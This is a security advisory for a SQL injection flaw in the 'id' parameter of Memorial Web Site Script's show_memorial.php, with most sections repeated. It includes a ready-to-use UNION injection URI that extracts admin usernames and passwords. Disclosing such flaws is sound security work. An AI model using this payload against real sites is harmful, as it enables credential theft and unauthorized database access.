Memorial Web Site Script 'id' Parameter SQL Injection Vulnerability
BID:39664
Info
Memorial Web Site Script 'id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 39664 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 23 2010 12:00AM |
| Updated: | Apr 23 2010 12:00AM |
| Credit: | v3n0m |
| Vulnerable: |
Easy Scripts Memorial Web Site Script 0 |
| Not Vulnerable: | |
Discussion
Memorial Web Site Script 'id' Parameter SQL Injection Vulnerability
Memorial Web Site Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Memorial Web Site Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Memorial Web Site Script 'id' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/[path]/show_memorial.php?id=[xxx]+and+1=2+union+all+select+1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8+from+admin--
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/[path]/show_memorial.php?id=[xxx]+and+1=2+union+all+select+1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8+from+admin--
Solution / Fix
Memorial Web Site Script 'id' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Memorial Web Site Script 'id' Parameter SQL Injection Vulnerability
References:
References:
- Memorial Web Site Script Homepage (Easy Scripts)